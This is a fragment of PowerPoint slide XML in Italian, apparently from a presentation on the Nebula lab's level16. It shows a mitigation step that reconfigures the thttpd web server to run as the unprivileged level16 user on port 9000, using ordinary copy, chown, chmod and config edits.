              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010583" y="1252219"/>
            <a:ext cx="7313596" cy="226667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285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>Creiamo una nuova configurazione nella home directory dell’utente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1"/>
              <a:t>level16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>Diventiamo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>, tramite l’utente nebula.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>Copiamo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1"/>
              <a:t>/home/flag16/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" err="1"/>
              <a:t>thttpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>nella home directory di level16.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /home/flag16/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>thttpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /home/level16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>Aggiorniamo i permessi del file appena copiato:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> level16:level16 /home/level16/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>thttpd.conf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chmod 755 /home/level16/thttpd.conf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Immagine 5" descr="Immagine che contiene testo&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9195D3FE-92F6-C499-80E2-EF65C35DE6DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1489794" y="3594082"/>
            <a:ext cx="6154009" cy="562053"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="92023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fade">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">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Effect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Immagine 4" descr="Immagine che contiene testo&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC0D6189-5D17-077C-80C2-6743BF2FD6D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="278381" y="1154213"/>
            <a:ext cx="4293619" cy="3458058"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rettangolo 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C94474C4-EB34-530B-834A-AA00555D11B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4405745" y="1119495"/>
            <a:ext cx="4738255" cy="402400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1439" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365850" y="447121"/>
            <a:ext cx="64122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it-IT"/>
              <a:t>MITIGAZIONE #1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1441" name="Google Shape;1441;p53"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4363259" y="1692663"/>
            <a:ext cx="4336105" cy="2381157"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1100"/>
              <a:t>Editiamo il file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="F99AAA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/home/flag16/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" b="1" i="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="F99AAA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>thttpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="F99AAA"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100"/>
              <a:t>in maniera tale da farlo funzionare correttamente sull’utente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" b="1"/>
              <a:t>level16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nano /home/level16/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>thttpd.conf</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="152400" lvl="0" indent="0" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1100"/>
              <a:t>Impostiamo una porta di ascolto TCP non in uso:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Port=9000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" lvl="0" indent="0" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1100"/>
              <a:t>Importiamo la directory radice del server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dir=/home/level16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1100"/>
              <a:t>Impostiamo l’esecuzione come utente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" b="1"/>
              <a:t>level16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>user=level16</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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5030269"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cove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39" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365850" y="447121"/>
            <a:ext cx="64122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MITIGAZIONE #1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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976;p108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE827554-4B0E-E24D-93EB-E98E9CD0BFE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010583" y="1252219"/>
            <a:ext cx="7313596" cy="209181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285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>Copiamo anche </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1"/>
              <a:t>/home/flag16/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" err="1"/>
              <a:t>index.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>nella home directory di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1"/>
              <a:t>level16:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ cp /home/flag16/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>index.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /home/level16</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>Aggiorniamo i suoi permessi:</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> level16:level16 /home/level16/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>index.cgi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0755 /home/level16/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>index.cgi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>Eseguiamo manualmente una nuova istanza del server Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" err="1"/>
              <a:t>thttpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>thttpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
